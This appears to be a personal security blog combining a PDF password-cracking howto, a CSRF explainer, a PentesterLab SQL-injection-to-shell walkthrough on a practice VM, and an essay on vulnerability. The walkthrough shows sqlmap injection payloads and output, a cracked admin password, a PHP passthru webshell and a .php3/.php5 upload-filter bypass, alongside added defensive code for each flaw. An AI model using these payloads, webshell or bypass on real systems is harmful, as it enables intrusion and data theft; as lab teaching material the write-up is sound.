How to crack the password on a PDF file?

Once in a while you need to do this (in CTFs, not real life lol) .. so the easiest way is to install John the Ripper ( https://www.openwall.com/john/ , I recommend the jumbo edition) and use its pdf2john utility to extract the hash that john needs in order to crack the file:

PATH_TO/pdf2john.pl password-protected.pdf > pdf.john

Then start john and happy cracking 🙂

For the dictionary attack you can use the best list I ever saw (2019): https://github.com/danielmiessler/SecLists/tree/master/Passwords

Example with one of the files from the above repository:

john --wordlist=PATH_TO_DICTIONARY pdf.john

or, for a brute-force approach:

john --incremental:ASCII pdf.john

Good luck!

Simple, no? 🙂


PS: This cheat-sheet really helps: https://www.nekhbet.ro/wp-content/2019/09/jtr-cheat-sheet.pdf

CSRF – Cross-Site Request Forgery (one-click attack or session riding)

It is a type of web attack in which unauthorized commands are executed on behalf of a user (without them realising it, because if they did realise .. who would stop them from doing it themselves? 🙂 ).

For it to work, the attacker needs to know the system on which the victim is authenticated.

Attack example: I, as the victim, am logged in to this blog, and the attacker Ion knows this and also knows that I visit Gheorghe's blog. Ion has found a security hole in Gheorghe's blog, say a stored XSS, which he plants as a comment on the latest article (he knows I will read it), and when I open the site, that stored XSS executes. The payload can simply be a GET request to a page that performs a certain action.

Recommended solutions for protecting against this type of attack:

CSRF tokens .. every action is done through a POST, and one of the fields is a token generated when the page is generated. The code checks whether the submitted token is the same as the stored/generated one. How is it bypassed .. simply, like any scraper of ASP (which has as its CSRF token a field called viewState): we do a GET, grab the token, then make our POST request with that token.
Example: https://digi.ninja/blog/xss_steal_csrf_token.php
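To make the token check concrete, here is an added example in Python (not code from this blog or from the linked article) of the synchronizer-token pattern described above: a random per-session token is embedded in the form when the page is generated and compared, in constant time, against the session's stored copy on every POST. The session store, form and handler names are hypothetical. Note what it covers and what it does not: a cross-site page cannot read the victim's token, so a forged POST fails; but, as the paragraph above says, a stored XSS on the same origin can read it, so the token does not replace fixing the XSS.

```python
"""Synchronizer-token CSRF check (added example; hypothetical session store,
form and handler, not the blog's code)."""
import hmac
import secrets
from typing import Dict

# Constructed in-memory session store: session id -> session data.
SESSIONS: Dict[str, Dict[str, str]] = {}


def new_session() -> str:
    """Create a session and bind a fresh random CSRF token to it."""
    session_id = secrets.token_urlsafe(32)
    SESSIONS[session_id] = {"csrf_token": secrets.token_urlsafe(32)}
    return session_id


def render_form(session_id: str) -> str:
    """When the page is generated, embed the session's token as a hidden field."""
    token = SESSIONS[session_id]["csrf_token"]
    return (
        '<form method="POST" action="/delete_post">'
        f'<input type="hidden" name="csrf_token" value="{token}">'
        '<input type="hidden" name="post_id" value="42">'
        "</form>"
    )


def handle_post(session_id: str, form: Dict[str, str]) -> bool:
    """Accept the state-changing POST only if the submitted token equals the
    one stored for *this* session. compare_digest keeps the check constant-time."""
    session = SESSIONS.get(session_id)
    if session is None:
        return False
    submitted = form.get("csrf_token", "").encode()
    expected = session["csrf_token"].encode()
    return hmac.compare_digest(submitted, expected)


def demo() -> Dict[str, bool]:
    """Three POSTs against the victim's session: the genuine form, a cross-site
    forgery that cannot know the token, and one reusing the attacker's own token."""
    victim = new_session()
    attacker = new_session()
    html = render_form(victim)
    # Extract the token from the rendered page, as the victim's browser would submit it.
    victim_token = html.split('name="csrf_token" value="')[1].split('"')[0]
    return {
        "genuine": handle_post(victim, {"csrf_token": victim_token, "post_id": "42"}),
        # The browser attaches the victim's cookie, but the attacker's page never
        # saw the token, so the field is missing.
        "forged_no_token": handle_post(victim, {"post_id": "42"}),
        # A token from the attacker's own session is not the victim's token.
        "forged_other_token": handle_post(
            victim, {"csrf_token": SESSIONS[attacker]["csrf_token"], "post_id": "42"}
        ),
    }


if __name__ == "__main__":
    print(demo())
```

The same check is what frameworks do behind names like `csrfmiddlewaretoken` or `_token`; the important properties are that the token is unpredictable, bound to the session, and compared in constant time.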

To be continued …

PentesterLab – From SQL Injection to Shell

https://pentesterlab.com/exercises/from_sqli_to_shell/course

Note: there are tons of methods to solve it 🙂 I tried the fastest one. Doing everything by "hand" (no tools) will bring the best learning experience, of course.

We have the VM .. now what?

Find its IP :))
Start it, then go to the host and:
nmap -v 10.42.0.* -p 80

Nmap scan report for 10.42.0.6
Host is up (0.00043s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http

(the VM was set with bridged adapter).

Open it in the browser now. Clicking around will show us a first GET parameter: http://10.42.0.6/cat.php?id=1

Playing with it (for example, adding a ' after the 1) will produce the well-known SQL error:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
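Why that quote breaks the page, and what the fix looks like, as an added example in Python over an in-memory SQLite copy of the pictures table (rows taken from the sqlmap dump further down; the query shape is my guess at what cat.php runs, not PentesterLab's code). The vulnerable version pastes id into the SQL text, so 1' is a syntax error (SQLite's wording differs from the MySQL message above, but it is the same class of error) and 1 OR 1=1 returns every row; the parameterized version binds the value, so both inputs simply match nothing.

```python
"""String-built vs parameterized lookup for cat.php?id=... (added example,
not PentesterLab's code; query shape is assumed)."""
import sqlite3
from typing import Dict, List, Union


def make_db() -> sqlite3.Connection:
    """In-memory copy of photoblog.pictures with the rows from the sqlmap dump."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE pictures (id INTEGER, img TEXT, cat INTEGER, title TEXT)")
    conn.executemany(
        "INSERT INTO pictures VALUES (?, ?, ?, ?)",
        [
            (1, "hacker.png", 2, "Hacker"),
            (2, "ruby.jpg", 1, "Ruby"),
            (3, "cthulhu.png", 1, "Cthulhu"),
        ],
    )
    return conn


def vulnerable_lookup(conn: sqlite3.Connection, user_id: str) -> List[str]:
    """The bug: the request parameter becomes part of the SQL text itself."""
    sql = f"SELECT title FROM pictures WHERE cat = {user_id}"
    return [row[0] for row in conn.execute(sql)]


def safe_lookup(conn: sqlite3.Connection, user_id: str) -> List[str]:
    """The fix: the value is bound to a placeholder and never parsed as SQL."""
    sql = "SELECT title FROM pictures WHERE cat = ?"
    return [row[0] for row in conn.execute(sql, (user_id,))]


def compare(user_id: str) -> Dict[str, Union[List[str], str]]:
    """Run both versions on the same input and report what each returns."""
    conn = make_db()
    try:
        vulnerable: Union[List[str], str] = vulnerable_lookup(conn, user_id)
    except sqlite3.OperationalError as exc:
        # This is the moment the blog sees the "error in your SQL syntax" page.
        vulnerable = f"SQL error: {exc}"
    return {"vulnerable": vulnerable, "parameterized": safe_lookup(conn, user_id)}


if __name__ == "__main__":
    for probe in ("1", "1'", "1 OR 1=1"):
        print(repr(probe), compare(probe))
```

The parameterized version returns nothing for the last two probes because the whole string is compared against the integer column as a value; no part of it is ever interpreted as SQL. That, not input filtering, is what closes the hole the rest of this walkthrough exploits.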

What does that tell us? 😀 .. sqlmap.
(Of course we could just run sqlmap -a -u URL and let it do everything, but for the sake of the exercise let's see it step by step.)

sqlmap --tables -u http://10.42.0.6/cat.php?id=1

        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.1#stable}
|_ -| . [']     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 08:59:27

[08:59:27] [INFO] resuming back-end DBMS 'mysql' 
[08:59:27] [INFO] testing connection to the target URL
[08:59:27] [INFO] heuristics detected web page charset 'ascii'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 6749=6749

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1 AND (SELECT 3352 FROM(SELECT COUNT(*),CONCAT(0x716b767871,(SELECT (ELT(3352=3352,1))),0x7171787071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=1 AND SLEEP(5)

    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: id=1 UNION ALL SELECT NULL,NULL,CONCAT(0x716b767871,0x485a735a576b785743455145644767476f454b4d667a4d51696679697a4858597976465852676e4b,0x7171787071),NULL-- pFAj
---
[08:59:27] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 6.0 (squeeze)
web application technology: PHP 5.3.3, Apache 2.2.16
back-end DBMS: MySQL >= 5.0
[08:59:27] [INFO] fetching database names
[08:59:27] [INFO] fetching tables for databases: 'information_schema, photoblog'
Database: photoblog
[3 tables]
+---------------------------------------+
| categories                            |
| pictures                              |
| users                                 |
+---------------------------------------+

Database: information_schema
[28 tables]
+---------------------------------------+
| CHARACTER_SETS                        |
| COLLATIONS                            |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS                               |
| COLUMN_PRIVILEGES                     |
| ENGINES                               |
| EVENTS                                |
| FILES                                 |
| GLOBAL_STATUS                         |
| GLOBAL_VARIABLES                      |
| KEY_COLUMN_USAGE                      |
| PARTITIONS                            |
| PLUGINS                               |
| PROCESSLIST                           |
| PROFILING                             |
| REFERENTIAL_CONSTRAINTS               |
| ROUTINES                              |
| SCHEMATA                              |
| SCHEMA_PRIVILEGES                     |
| SESSION_STATUS                        |
| SESSION_VARIABLES                     |
| STATISTICS                            |
| TABLES                                |
| TABLE_CONSTRAINTS                     |
| TABLE_PRIVILEGES                      |
| TRIGGERS                              |
| USER_PRIVILEGES                       |
| VIEWS                                 |
+---------------------------------------+

[08:59:27] [INFO] fetched data logged to text files under '/home/unknown/.sqlmap/output/10.42.0.6'

[*] shutting down at 08:59:27

Yuppy, we can see the 'users' table 🙂 .. let's go for an account.

sqlmap --dump photoblog -u http://10.42.0.6/cat.php?id=1

        ___
       __H__
 ___ ___[']_____ ___ ___  {1.1#stable}
|_ -| . [,]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 09:02:52

[09:02:52] [INFO] resuming back-end DBMS 'mysql' 
[09:02:52] [INFO] testing connection to the target URL
[09:02:52] [INFO] heuristics detected web page charset 'ascii'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 6749=6749

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1 AND (SELECT 3352 FROM(SELECT COUNT(*),CONCAT(0x716b767871,(SELECT (ELT(3352=3352,1))),0x7171787071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=1 AND SLEEP(5)

    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: id=1 UNION ALL SELECT NULL,NULL,CONCAT(0x716b767871,0x485a735a576b785743455145644767476f454b4d667a4d51696679697a4858597976465852676e4b,0x7171787071),NULL-- pFAj
---
[09:02:52] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 6.0 (squeeze)
web application technology: PHP 5.3.3, Apache 2.2.16
back-end DBMS: MySQL >= 5.0
[09:02:52] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[09:02:52] [INFO] fetching current database
[09:02:52] [INFO] fetching tables for database: 'photoblog'
[09:02:52] [INFO] fetching columns for table 'pictures' in database 'photoblog'
[09:02:52] [INFO] fetching entries for table 'pictures' in database 'photoblog'
[09:02:52] [INFO] analyzing table dump for possible password hashes
Database: photoblog
Table: pictures
[3 entries]
+----+-------------+-----+---------+
| id | img         | cat | title   |
+----+-------------+-----+---------+
| 1  | hacker.png  | 2   | Hacker  |
| 2  | ruby.jpg    | 1   | Ruby    |
| 3  | cthulhu.png | 1   | Cthulhu |
+----+-------------+-----+---------+

[09:02:52] [INFO] table 'photoblog.pictures' dumped to CSV file '/home/unknown/.sqlmap/output/10.42.0.6/dump/photoblog/pictures.csv'
[09:02:52] [INFO] fetching columns for table 'users' in database 'photoblog'
[09:02:52] [INFO] fetching entries for table 'users' in database 'photoblog'
[09:02:52] [INFO] analyzing table dump for possible password hashes
[09:02:52] [INFO] recognized possible password hashes in column 'password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] 
do you want to crack them via a dictionary-based attack? [Y/n/q] 
[09:02:57] [INFO] using hash method 'md5_generic_passwd'
[09:02:57] [INFO] resuming password 'P4ssw0rd' for hash '8efe310f9ab3efeae8d410a8e0166eb2' for user 'admin'
[09:02:57] [INFO] postprocessing table dump
Database: photoblog
Table: users
[1 entry]
+----+-------+---------------------------------------------+
| id | login | password                                    |
+----+-------+---------------------------------------------+
| 1  | admin | 8efe310f9ab3efeae8d410a8e0166eb2 (P4ssw0rd) |
+----+-------+---------------------------------------------+

[09:02:57] [INFO] table 'photoblog.users' dumped to CSV file '/home/unknown/.sqlmap/output/10.42.0.6/dump/photoblog/users.csv'
[09:02:57] [INFO] fetching columns for table 'categories' in database 'photoblog'
[09:02:57] [INFO] fetching entries for table 'categories' in database 'photoblog'
[09:02:57] [INFO] analyzing table dump for possible password hashes
Database: photoblog
Table: categories
[3 entries]
+----+--------+
| id | title  |
+----+--------+
| 1  | test   |
| 2  | ruxcon |
| 3  | 2010   |
+----+--------+

[09:02:57] [INFO] table 'photoblog.categories' dumped to CSV file '/home/unknown/.sqlmap/output/10.42.0.6/dump/photoblog/categories.csv'
[09:02:57] [INFO] fetched data logged to text files under '/home/unknown/.sqlmap/output/10.42.0.6'

[*] shutting down at 09:02:57

So the account is admin / P4ssw0rd (stored as an unsalted MD5 hash).

Note: if sqlmap can’t break the password, use the online tools OR https://github.com/Talanor/findmyhash or whatever else you prefer.
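What "md5, no salt" means in practice, as an added example in Python (not the blog's or PentesterLab's code): an unsalted MD5 is the same value for every user with that password, so one table precomputed from a wordlist cracks all of them at lookup speed, which is exactly what sqlmap's dictionary step did above. A salted, iterated hash such as PBKDF2-HMAC-SHA256 gives every user a different hash and makes each guess cost an iteration count the defender chooses. The mini wordlist and the iteration count are constructed for the example.

```python
"""Unsalted MD5 vs salted PBKDF2 password storage (added example, not the blog's code)."""
import hashlib
import hmac
import secrets
from typing import Dict, Iterable, Optional

# Constructed mini wordlist; a real one is the SecLists repository linked earlier.
WORDLIST = ["password", "123456", "P4ssw0rd", "letmein"]


def unsalted_md5(password: str) -> str:
    """What the target stores: deterministic, so identical passwords collide."""
    return hashlib.md5(password.encode()).hexdigest()


def build_lookup(words: Iterable[str]) -> Dict[str, str]:
    """Precomputed table hash -> word. Built once, it works against every user."""
    return {unsalted_md5(w): w for w in words}


def crack_unsalted(stored_hex: str, table: Dict[str, str]) -> Optional[str]:
    """Recovering an unsalted hash is a dictionary lookup, not a computation."""
    return table.get(stored_hex.lower())


def hash_password(password: str, iterations: int = 600_000) -> str:
    """Salted, iterated hash: 16 random salt bytes, PBKDF2-HMAC-SHA256.
    The iteration count is a tunable cost (600,000 is the default chosen here)."""
    salt = secrets.token_bytes(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    # Self-describing record: algorithm, cost and salt travel with the hash.
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and cost, then compare in constant time."""
    try:
        algo, iters, salt_hex, dk_hex = stored.split("$")
    except ValueError:
        return False
    if algo != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk, bytes.fromhex(dk_hex))


if __name__ == "__main__":
    table = build_lookup(WORDLIST)
    print("unsalted md5 cracked to:", crack_unsalted(unsalted_md5("P4ssw0rd"), table))
    record = hash_password("P4ssw0rd")
    print("salted record:", record)
    print("verify correct:", verify_password("P4ssw0rd", record))
    print("verify wrong:  ", verify_password("P4ssw0rd!", record))
```

With the salted scheme the precomputed table is useless, because the attacker would need one table per salt, and each candidate costs the full iteration count rather than a single MD5.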

After logging in to the admin side we see an upload field at http://10.42.0.6/admin/new.php, so .. that tells us how to get to the shell: by uploading a script (a webshell).
The easiest one, considering we are running Apache + PHP, is .. one using exec/passthru/system, whichever you like 🙂

<?php passthru ($_REQUEST['cmd']); ?>

But we will see that it doesn't allow .php files to be uploaded, so try .php3 or .php5 instead, then access the file with whatever GET/POST parameter payload you want, for example:

http://10.42.0.6/admin/uploads/ffff.php3?cmd=whoami
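From the other side of the upload form: an added example in Python (hypothetical upload handler, not PentesterLab's code) of why a check that only rejects .php fails exactly as described above, and what an allowlist check looks like instead. The denylist version lets .php3 and .php5 through; the allowlist version accepts only image extensions whose content starts with the matching file signature and stores the file under a server-chosen name, so the original name and extension never reach the web root. The sample uploads are constructed.

```python
"""Denylist vs allowlist upload validation (added example; hypothetical handler)."""
import os
import secrets
from typing import Dict, Iterable, List, Optional, Tuple

# A denylist in the style of "no .php files".
DENYLIST = {".php"}

# Allowlist: extension -> file signature the content must begin with.
ALLOWED_TYPES = {
    ".png": b"\x89PNG\r\n\x1a\n",
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
    ".gif": b"GIF8",
}


def denylist_accepts(filename: str) -> bool:
    """Blocks .php only; every other extension, including .php3/.php5, passes."""
    return os.path.splitext(filename)[1].lower() not in DENYLIST


def allowlist_accepts(filename: str, content: bytes) -> Optional[str]:
    """Accept only a known image extension whose bytes carry the matching signature.
    Returns the server-chosen storage name, or None to reject."""
    ext = os.path.splitext(os.path.basename(filename))[1].lower()
    signature = ALLOWED_TYPES.get(ext)
    if signature is None or not content.startswith(signature):
        return None
    return secrets.token_hex(8) + ext  # the original name is discarded


# Constructed sample uploads: (submitted name, first bytes of content).
SAMPLE_UPLOADS: List[Tuple[str, bytes]] = [
    ("photo.png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 16),
    ("ffff.php", b"<?php /* any script */ ?>"),
    ("ffff.php3", b"<?php /* any script */ ?>"),
    ("ffff.php5", b"<?php /* any script */ ?>"),
    ("shell.png", b"<?php /* any script */ ?>"),  # allowed extension, non-image bytes
]


def triage(uploads: Iterable[Tuple[str, bytes]]) -> Dict[str, Tuple[bool, bool]]:
    """For each upload: (passes the denylist, passes the allowlist)."""
    return {
        name: (denylist_accepts(name), allowlist_accepts(name, data) is not None)
        for name, data in uploads
    }


if __name__ == "__main__":
    for name, (deny_ok, allow_ok) in triage(SAMPLE_UPLOADS).items():
        print(
            f"{name:12} denylist={'accept' if deny_ok else 'reject':6} "
            f"allowlist={'accept' if allow_ok else 'reject'}"
        )
```

The signature check is defence in depth, not the main control: the allowlist of extensions plus the server-generated filename is what stops the .php3/.php5 trick, and serving the upload directory with script execution disabled (or from outside the web root) covers the case where the web server maps yet another extension to PHP.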

For nicer webshells, check this one out:

https://github.com/epinna/weevely3

No small talk #6 – Vulnerability

Thoughts, raw, unfiltered, uncorrected, un-anything 🙂


Nowadays everything seems to tend toward absolute positivism .. whatever you do, as an adult, it MUST be good, it must be perfect, positive, so you can happily post on Facebook the things that show it. Any motivational post draws a shower of likes. Any negative feeling must be ignored, life is only rosy, we must ALWAYS see only the positive side.

For me, personally, all of this is an illusion, a fear of being vulnerable, of trying to force ourselves to be happy until we come to believe it, of superficially rewriting our vision and perspective on life.

But is .. life only rosy? Or are we really just sweeping the negative emotions under the rug: sadness, fear, depression, dread, stress? And when the rug keeps rising, centimetre by centimetre, what do we do? Where do we empty it? How do we let it out? Through more lies? (we lie to ourselves and to others) or what?

The problem seems to be .. that nowadays we lack the courage to be vulnerable and we continuously suppress this vulnerability. We don't have to be heroes, just to own this vulnerability, these "negative" things, and integrate them into ourselves, accept them and welcome them as they come.

Many people do nothing out of fear of this vulnerability .. and I was the same .. I'd go to events where there was dancing, and I don't know how to dance .. why should I dance? To look stupid? Nah, better to stay in my lane! That is just a minor example of self-limitation because of vulnerability. Another .. the workday is over .. I won't be the first to leave because … reason X.

I believe the very process of evolution, on every level, is based more on mistakes than on successes.
To be like Dan .. examples .. (legend, doh) Edison failed 999 times trying to invent the light bulb and, asked by a journalist why he didn't give up after failing so many times, he answered that he hadn't failed, he had found 999 ways that didn't work.

Pain, fear, sadness etc. seem negative, but are they really so meaningless?

Group questions:

1) What do you think about what I said? Briefly, in a few clear words, no stories! Thank you!

2) One single event from the past month when you felt vulnerable. Do you think you can get past this vulnerability? What ideas do you have?